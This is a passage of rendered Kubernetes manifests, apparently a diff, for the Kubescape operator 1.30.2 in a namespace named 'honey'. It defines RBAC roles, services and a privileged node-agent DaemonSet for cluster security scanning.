1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubescape + tier: ks-control-plane + kubescape.io/ignore: 'true' +rules: +- apiGroups: + - '' + resources: + - pods + - pods/proxy + - namespaces + - nodes + - configmaps + - services + - serviceaccounts + - endpoints + - persistentvolumeclaims + - persistentvolumes + - limitranges + - replicationcontrollers + - podtemplates + - resourcequotas + - events + verbs: + - get + - watch + - list +- apiGroups: + - '' + resources: + - secrets + verbs: + - get + - watch + - list +- apiGroups: + - admissionregistration.k8s.io + resources: + - mutatingwebhookconfigurations + - validatingwebhookconfigurations + verbs: + - get + - watch + - list +- apiGroups: + - apiregistration.k8s.io + resources: + - apiservices + verbs: + - get + - watch + - list +- apiGroups: + - apps + resources: + - deployments + - statefulsets + - daemonsets + - replicasets + - controllerrevisions + verbs: + - get + - watch + - list +- apiGroups: + - autoscaling + resources: + - horizontalpodautoscalers + verbs: + - get + - watch + - list +- apiGroups: + - batch + resources: + - jobs + - cronjobs + verbs: + - get + - watch + - list +- apiGroups: + - coordination.k8s.io + resources: + - leases + verbs: + - get + - watch + - list +- apiGroups: + - discovery.k8s.io + resources: + - endpointslices + verbs: + - get + - watch + - list +- apiGroups: + - events.k8s.io + resources: + - events + verbs: + - get + - watch + - list +- apiGroups: + - hostdata.kubescape.cloud + resources: + - APIServerInfo + - ControlPlaneInfo + verbs: + - get + - watch + - list +- apiGroups: + - networking.k8s.io + resources: + - networkpolicies + - Ingress + verbs: + - get + - watch + - list +- apiGroups: + - cilium.io + resources: + - ciliumnetworkpolicies + verbs: + - get + - list + - watch +- apiGroups: + - projectcalico.org + resources: + - networkpolicies + verbs: + - get + - list + - watch +- apiGroups: + - networking.istio.io + resources: + - gateways + - virtualservices + verbs: + - get + - list + - watch +- apiGroups: + - security.istio.io + resources: + - authorizationpolicies + verbs: + - get + - list + - watch +- apiGroups: + - policy + resources: + - poddisruptionbudgets + - podsecuritypolicies + - PodSecurityPolicy + verbs: + - get + - watch + - list +- apiGroups: + - rbac.authorization.k8s.io + resources: + - clusterroles + - clusterrolebindings + - roles + - rolebindings + verbs: + - get + - watch + - list +- apiGroups: + - storage.k8s.io + resources: + - csistoragecapacities + - storageclasses + verbs: + - get + - watch + - list +- apiGroups: + - networking.k8s.io + resources: + - ingresses + verbs: + - get + - watch + - list +- apiGroups: + - extensions + resources: + - Ingress + verbs: + - get + - watch + - list +- apiGroups: + - gateway.networking.k8s.io + resources: + - httproutes + - gateways + - gatewayclasses + - tcproutes + - tlsroutes + - udproutes + verbs: + - get + - watch + - list +- apiGroups: + - '' + resources: + - namespaces + verbs: + - update +- apiGroups: + - spdx.softwarecomposition.kubescape.io + resources: + - workloadconfigurationscans + - workloadconfigurationscansummaries + verbs: + - create + - get + - update + - patch +- apiGroups: + - kubescape.io + resources: + - servicesscanresults + verbs: + - get + - watch + - list +--- +kind: ClusterRole +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: kubevuln + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubevuln + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubevuln + tier: ks-control-plane + kubescape.io/ignore: 'true' +rules: +- apiGroups: + - spdx.softwarecomposition.kubescape.io + resources: + - vulnerabilitymanifests + - vulnerabilitymanifestsummaries + - openvulnerabilityexchangecontainers + - sbomsyfts + - sbomsyftfiltereds + verbs: + - create + - get + - update + - watch + - list + - patch +- apiGroups: + - spdx.softwarecomposition.kubescape.io + resources: + - containerprofiles + verbs: + - get + - watch + - list +--- +kind: ClusterRole +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: node-agent + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: node-agent + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: node-agent + tier: ks-control-plane + kubescape.io/ignore: 'true' +rules: +- apiGroups: + - '' + resources: + - nodes + - nodes/proxy + - services + - endpoints + - namespaces + - configmaps + verbs: + - get + - watch + - list +- apiGroups: + - '' + resources: + - pods + verbs: + - get + - watch + - list + - delete +- apiGroups: + - '' + resources: + - events + verbs: + - get + - watch + - list +- apiGroups: + - batch + resources: + - jobs + - cronjobs + verbs: + - get + - watch + - list +- apiGroups: + - apps + resources: + - deployments + - daemonsets + - statefulsets + - replicasets + verbs: + - get + - watch + - list +- apiGroups: + - spdx.softwarecomposition.kubescape.io + resources: + - applicationprofiles + - networkneighborhoods + verbs: + - get + - watch + - list +- apiGroups: + - kubescape.io + resources: + - seccompprofiles + verbs: + - get + - watch + - list +- apiGroups: + - spdx.softwarecomposition.kubescape.io + resources: + - containerprofiles + - sbomsyfts + verbs: + - create + - get + - update + - watch + - list + - patch +- apiGroups: + - kubescape.io + resources: + - runtimerulealertbindings + verbs: + - list + - watch +- apiGroups: + - kubescape.io + resources: + - operatorcommands + verbs: + - get + - watch + - list +- apiGroups: + - kubescape.io + resources: + - operatorcommands/status + verbs: + - get + - watch + - list + - update + - patch +- apiGroups: + - events.k8s.io + resources: + - events + verbs: + - create + - patch + - get +- apiGroups: + - kubescape.io + resources: + - rules + verbs: + - list + - watch +--- +kind: ClusterRole +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: operator + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: operator + tier: ks-control-plane + kubescape.io/ignore: 'true' +rules: +- apiGroups: + - '' + resources: + - pods + - nodes + - namespaces + - configmaps + - services + verbs: + - get + - watch + - list +- apiGroups: + - '' + resources: + - events + verbs: + - create + - patch +- apiGroups: + - '' + resources: + - secrets + verbs: + - get + - watch + - list +- apiGroups: + - batch + resources: + - jobs + - cronjobs + verbs: + - get + - watch + - list + - create + - update + - delete + - patch +- apiGroups: + - apps + resources: + - deployments + - daemonsets + - statefulsets + - replicasets + verbs: + - get + - watch + - list +- apiGroups: + - spdx.softwarecomposition.kubescape.io + resources: + - vulnerabilitymanifests + - vulnerabilitymanifestsummaries + - workloadconfigurationscans + - workloadconfigurationscansummaries + - openvulnerabilityexchangecontainers + - containerprofiles + - sbomsyfts + verbs: + - get + - watch + - list + - delete +- apiGroups: + - kubescape.io + resources: + - runtimerulealertbindings + verbs: + - list + - watch + - get +- apiGroups: + - kubescape.io + resources: + - servicesscanresults + verbs: + - get + - watch + - list + - create + - update + - delete + - patch +- apiGroups: + - kubescape.io + resources: + - operatorcommands + verbs: + - get + - watch + - list + - create + - update + - patch +- apiGroups: + - kubescape.io + resources: + - operatorcommands/status + verbs: + - get + - watch + - list + - update + - patch +--- +kind: ClusterRole +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: prometheus-exporter + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: prometheus-exporter + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: prometheus-exporter + tier: ks-control-plane + kubescape.io/ignore: 'true' +rules: +- apiGroups: + - spdx.softwarecomposition.kubescape.io + resources: + - configurationscansummaries + - vulnerabilitysummaries + verbs: + - get + - watch + - list +--- +kind: ClusterRole +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: storage + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: storage + tier: ks-control-plane + kubescape.io/ignore: 'true' +rules: +- apiGroups: + - '' + resources: + - namespaces + - pods + - services + verbs: + - get + - watch + - list +- apiGroups: + - admissionregistration.k8s.io + resources: + - mutatingwebhookconfigurations + - validatingwebhookconfigurations + verbs: + - get + - watch + - list +- apiGroups: + - apps + resources: + - daemonsets + - deployments + - replicasets + - statefulsets + verbs: + - get + - watch + - list +- apiGroups: + - batch + resources: + - cronjobs + - jobs + verbs: + - get + - watch + - list +- apiGroups: + - flowcontrol.apiserver.k8s.io + resources: + - prioritylevelconfigurations + - flowschemas + verbs: + - get + - watch + - list +--- +kind: ClusterRoleBinding +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: kubescape + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubescape + tier: ks-control-plane + kubescape.io/ignore: 'true' +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: ClusterRole + name: kubescape +subjects: +- kind: ServiceAccount + name: kubescape + namespace: honey +--- +kind: ClusterRoleBinding +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: kubevuln + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubevuln + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubevuln + tier: ks-control-plane + kubescape.io/ignore: 'true' +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: ClusterRole + name: kubevuln +subjects: +- kind: ServiceAccount + name: kubevuln + namespace: honey +--- +kind: ClusterRoleBinding +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: node-agent + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: node-agent + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: node-agent + tier: ks-control-plane + kubescape.io/ignore: 'true' +subjects: +- kind: ServiceAccount + name: node-agent + namespace: honey +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: ClusterRole + name: node-agent +--- +kind: ClusterRoleBinding +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: operator + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: operator + tier: ks-control-plane + kubescape.io/ignore: 'true' +subjects: +- kind: ServiceAccount + name: operator + namespace: honey +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: ClusterRole + name: operator +--- +kind: ClusterRoleBinding +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: prometheus-exporter + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: prometheus-exporter + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: prometheus-exporter + tier: ks-control-plane + kubescape.io/ignore: 'true' +subjects: +- kind: ServiceAccount + name: prometheus-exporter + namespace: honey +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: ClusterRole + name: prometheus-exporter +--- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRoleBinding +metadata: + name: storage:system:auth-delegator + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: storage + tier: ks-control-plane + kubescape.io/ignore: 'true' +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: ClusterRole + name: system:auth-delegator +subjects: +- kind: ServiceAccount + name: storage + namespace: honey +--- +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRoleBinding +metadata: + name: storage + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: storage + tier: ks-control-plane + kubescape.io/ignore: 'true' +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: ClusterRole + name: storage +subjects: +- kind: ServiceAccount + name: storage + namespace: honey +--- +kind: Role +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: kubescape + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubescape + tier: ks-control-plane + kubescape.io/ignore: 'true' +rules: +- apiGroups: + - apps + resources: + - daemonsets + verbs: + - create + - get + - update + - watch + - list + - patch + - delete +--- +kind: Role +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: operator + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: operator + tier: ks-control-plane + kubescape.io/ignore: 'true' +rules: +- apiGroups: + - '' + resources: + - configmaps + - secrets + verbs: + - create + - get + - update + - watch + - list + - patch + - delete +- apiGroups: + - batch + resources: + - cronjobs + verbs: + - create + - get + - update + - watch + - list + - patch + - delete +--- +kind: RoleBinding +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: kubescape + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubescape + tier: ks-control-plane + kubescape.io/ignore: 'true' +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: Role + name: kubescape +subjects: +- kind: ServiceAccount + name: kubescape + namespace: honey +--- +kind: RoleBinding +apiVersion: rbac.authorization.k8s.io/v1 +metadata: + name: operator + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: operator + tier: ks-control-plane + kubescape.io/ignore: 'true' +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: Role + name: operator +subjects: +- kind: ServiceAccount + name: operator + namespace: honey +--- +apiVersion: v1 +kind: Service +metadata: + name: kubescape + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubescape + tier: ks-control-plane + kubescape.io/ignore: 'true' +spec: + type: ClusterIP + ports: + - name: http + port: 8080 + targetPort: 8080 + protocol: TCP + selector: + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape +--- +apiVersion: v1 +kind: Service +metadata: + name: kubevuln + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubevuln + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubevuln + tier: ks-control-plane + kubescape.io/ignore: 'true' +spec: + type: ClusterIP + ports: + - port: 8080 + targetPort: 8080 + protocol: TCP + selector: + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubevuln +--- +apiVersion: v1 +kind: Service +metadata: + name: node-agent + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: node-agent + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: node-agent + tier: ks-control-plane + kubescape.io/ignore: 'true' +spec: + ports: + - name: prometheus + port: 8080 + targetPort: 8080 + protocol: TCP + selector: + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: node-agent +--- +apiVersion: v1 +kind: Service +metadata: + name: kubescape-admission-webhook + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: operator + tier: ks-control-plane + kubescape.io/ignore: 'true' +spec: + ports: + - port: 443 + targetPort: 8443 + selector: + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + type: ClusterIP +--- +apiVersion: v1 +kind: Service +metadata: + name: operator + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: operator + tier: ks-control-plane + kubescape.io/ignore: 'true' +spec: + type: ClusterIP + ports: + - port: 4002 + targetPort: 4002 + protocol: TCP + selector: + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator +--- +apiVersion: v1 +kind: Service +metadata: + name: prometheus-exporter + namespace: honey + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: prometheus-exporter + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: prometheus-exporter + tier: ks-control-plane + kubescape.io/ignore: 'true' +spec: + type: null + ports: + - port: 8080 + targetPort: 8080 + protocol: TCP + selector: + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: prometheus-exporter +--- +apiVersion: v1 +kind: Service +metadata: + name: storage + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: storage + tier: ks-control-plane + kubescape.io/ignore: 'true' +spec: + ports: + - port: 443 + protocol: TCP + targetPort: 8443 + name: https + selector: + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage +--- +apiVersion: apps/v1 +kind: DaemonSet +metadata: + name: node-agent + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: node-agent + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: node-agent + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +spec: + selector: + matchLabels: + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: node-agent + template: + metadata: + annotations: + checksum/node-agent-config: ec2818edfe76e3a71137b1e9c55bd598a3f49c75af64d9f74061e320150c439b + checksum/cloud-secret: fd7d2ee3b19c0318d4630577e36a743e2e6840df1d6bfa09b147bdf94c70ccc2 + checksum/cloud-config: c91497d8f6fbf920f47b897ff4620129dbf7fa380bea096144c50298cc023996 + container.apparmor.security.beta.kubernetes.io/node-agent: unconfined + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: node-agent + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: node-agent + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core + spec: + securityContext: null + priorityClassName: kubescape-critical + serviceAccountName: node-agent + automountServiceAccountToken: true + hostPID: true + volumes: + - hostPath: + path: / + name: host + - hostPath: + path: /var/lib/kubelet + name: kubeletdir + - hostPath: + path: /run + name: run + - hostPath: + path: /var + name: var + - hostPath: + path: /sys/fs/cgroup + name: cgroup + - hostPath: + path: /lib/modules + name: modules + - hostPath: + path: /sys/fs/bpf + name: bpffs + - hostPath: + path: /sys/kernel/debug + name: debugfs + - hostPath: + path: /boot + name: boot + - emptyDir: null + name: data + - emptyDir: null + name: profiles + - emptyDir: {} + name: clamdb + - emptyDir: {} + name: clamrun + - configMap: + items: + - key: clamd.conf + path: clamd.conf + - key: freshclam.conf + path: freshclam.conf + name: clamav + name: etc + - name: cloud-secret + secret: + secretName: cloud-secret + - name: ks-cloud-config + configMap: + name: ks-cloud-config + items: + - key: clusterData + path: clusterData.json + - name: config + configMap: + name: node-agent + items: + - key: config.json + path: config.json + containers: + - name: node-agent + image: ghcr.io/k8sstormcenter/node-agent:dev-e64d59a + imagePullPolicy: IfNotPresent + livenessProbe: + httpGet: + path: /livez + port: 7888 + initialDelaySeconds: 60 + periodSeconds: 3 + readinessProbe: + httpGet: + path: /readyz + port: 7888 + initialDelaySeconds: 3 + periodSeconds: 3 + resources: + limits: + cpu: 500m + memory: 1400Mi + requests: + cpu: 100m + memory: 180Mi + env: + - name: GOMEMLIMIT + valueFrom: + resourceFieldRef: + resource: limits.memory + divisor: '1' + - name: GOMAXPROCS + valueFrom: + resourceFieldRef: + resource: limits.cpu + divisor: '1' + - name: HOST_ROOT + value: /host + - name: KS_LOGGER_LEVEL + value: info + - name: KS_LOGGER_NAME + value: zap + - name: NODE_NAME + valueFrom: + fieldRef: + fieldPath: spec.nodeName + - name: POD_NAME + valueFrom: + fieldRef: + fieldPath: metadata.name + - name: NAMESPACE_NAME + valueFrom: + fieldRef: + fieldPath: metadata.namespace + - name: KUBELET_ROOT + value: /var/lib/kubelet + - name: AGENT_VERSION + value: dev-e64d59a + - name: NodeName + valueFrom: + fieldRef: + fieldPath: spec.nodeName + securityContext: + runAsUser: 0 + privileged: false + capabilities: + add: + - SYS_ADMIN + - SYS_PTRACE + - NET_ADMIN + - SYSLOG + - SYS_RESOURCE + - IPC_LOCK + - NET_RAW + seLinuxOptions: + type: spc_t + volumeMounts: + - mountPath: /host + name: host + readOnly: true + - mountPath: /var/lib/kubelet + name: kubeletdir + - mountPath: /run + name: run + - mountPath: /var + name: var + readOnly: true + - mountPath: /lib/modules + name: modules + readOnly: true + - mountPath: /sys/kernel/debug + name: debugfs + - mountPath: /sys/fs/cgroup + name: cgroup + readOnly: true + - mountPath: /sys/fs/bpf + name: bpffs + - mountPath: /data + name: data + - mountPath: /profiles + name: profiles + - mountPath: /boot + name: boot + readOnly: true + - mountPath: /clamav + name: clamrun + - name: cloud-secret + mountPath: /etc/credentials + readOnly: true + - name: ks-cloud-config + mountPath: /etc/config/clusterData.json + readOnly: true + subPath: clusterData.json + - name: config + mountPath: /etc/config/config.json + readOnly: true + subPath: config.json + nodeSelector: + kubernetes.io/os: linux + affinity: + nodeAffinity: + requiredDuringSchedulingIgnoredDuringExecution: + nodeSelectorTerms: + - matchExpressions: + - key: kubernetes.io/os + operator: In + values: + - linux + tolerations: null +--- +apiVersion: apps/v1 +kind: Deployment +metadata: + name: kubescape + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubescape + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +spec: + replicas: 1 + revisionHistoryLimit: 2 + strategy: + rollingUpdate: + maxSurge: 0% + maxUnavailable: 100% + type: RollingUpdate + selector: + matchLabels: + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape + template: + metadata: + annotations: + checksum/host-scanner-configmap: 0c613e2144b1680df672142a6083c39de89a1c781db9d1a60eb31789966a26ea + checksum/cloud-secret: fd7d2ee3b19c0318d4630577e36a743e2e6840df1d6bfa09b147bdf94c70ccc2 + checksum/cloud-config: c91497d8f6fbf920f47b897ff4620129dbf7fa380bea096144c50298cc023996 + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubescape + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core + spec: + securityContext: + seccompProfile: + type: RuntimeDefault + runAsUser: 65532 + fsGroup: 65532 + containers: + - name: kubescape + image: quay.io/kubescape/kubescape:v3.0.47 + imagePullPolicy: IfNotPresent + securityContext: + allowPrivilegeEscalation: false + readOnlyRootFilesystem: true + runAsNonRoot: true + ports: + - name: http + containerPort: 8080 + protocol: TCP + livenessProbe: + httpGet: + path: /livez + port: 8080 + initialDelaySeconds: 3 + periodSeconds: 3 + readinessProbe: + httpGet: + path: /readyz + port: 8080 + initialDelaySeconds: 3 + periodSeconds: 3 + env: + - name: GOMEMLIMIT + valueFrom: + resourceFieldRef: + resource: limits.memory + divisor: '1' + - name: GOMAXPROCS + valueFrom: + resourceFieldRef: + resource: limits.cpu + divisor: '1' + - name: KS_LOGGER_LEVEL + value: info + - name: KS_LOGGER_NAME + value: zap + - name: KS_DOWNLOAD_ARTIFACTS + value: 'true' + - name: RULE_PROCESSING_GOMAXPROCS + value: '' + - name: KS_DEFAULT_CONFIGMAP_NAME + value: kubescape-config + - name: KS_DEFAULT_CONFIGMAP_NAMESPACE + valueFrom: + fieldRef: + fieldPath: metadata.namespace + - name: KS_CONTEXT + value: bobexample + - name: KS_DEFAULT_CLOUD_CONFIGMAP_NAME + value: ks-cloud-config + - name: KS_ENABLE_HOST_SCANNER + value: 'true' + - name: KS_SKIP_UPDATE_CHECK + value: 'false' + - name: KS_HOST_SCAN_YAML + value: /home/nonroot/.kubescape/host-scanner.yaml + - name: LARGE_CLUSTER_SIZE + value: '1500' + - name: KS_EXCLUDE_NAMESPACES + value: kubescape,kube-system,kube-public,kube-node-lease,local-path-storage,gmp-system,gmp-public,storm,lightening,cert-manager,kube-flannel,ingress-nginx,olm,px-operator,honey,pl,clickhouse + command: + - ksserver + resources: + limits: + cpu: 600m + memory: 1Gi + requests: + cpu: 250m + memory: 400Mi + volumeMounts: + - name: cloud-secret + mountPath: /etc/credentials + readOnly: true + - name: kubescape-volume + mountPath: /home/nonroot/.kubescape + subPath: config.json + - name: host-scanner-definition + mountPath: /home/nonroot/.kubescape/host-scanner.yaml + subPath: host-scanner-yaml + - name: results + mountPath: /home/nonroot/results + - name: failed + mountPath: /home/nonroot/failed + - name: ks-cloud-config + mountPath: /etc/config/clusterData.json + readOnly: true + subPath: clusterData.json + volumes: + - name: cloud-secret + secret: + secretName: cloud-secret + - name: ks-cloud-config + configMap: + name: ks-cloud-config + items: + - key: clusterData + path: clusterData.json + - name: host-scanner-definition + configMap: + name: host-scanner-definition + - name: kubescape-volume + emptyDir: {} + - name: results + emptyDir: {} + - name: failed + emptyDir: {} + serviceAccountName: kubescape + automountServiceAccountToken: true + nodeSelector: + kubernetes.io/os: linux + affinity: null + tolerations: null +--- +apiVersion: apps/v1 +kind: Deployment +metadata: + name: kubevuln + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubevuln + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubevuln + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/tier: core +spec: + replicas: 1 + revisionHistoryLimit: 2 + strategy: + type: Recreate + selector: + matchLabels: + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubevuln + template: + metadata: + annotations: + checksum/cloud-secret: fd7d2ee3b19c0318d4630577e36a743e2e6840df1d6bfa09b147bdf94c70ccc2 + checksum/cloud-config: c91497d8f6fbf920f47b897ff4620129dbf7fa380bea096144c50298cc023996 + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + 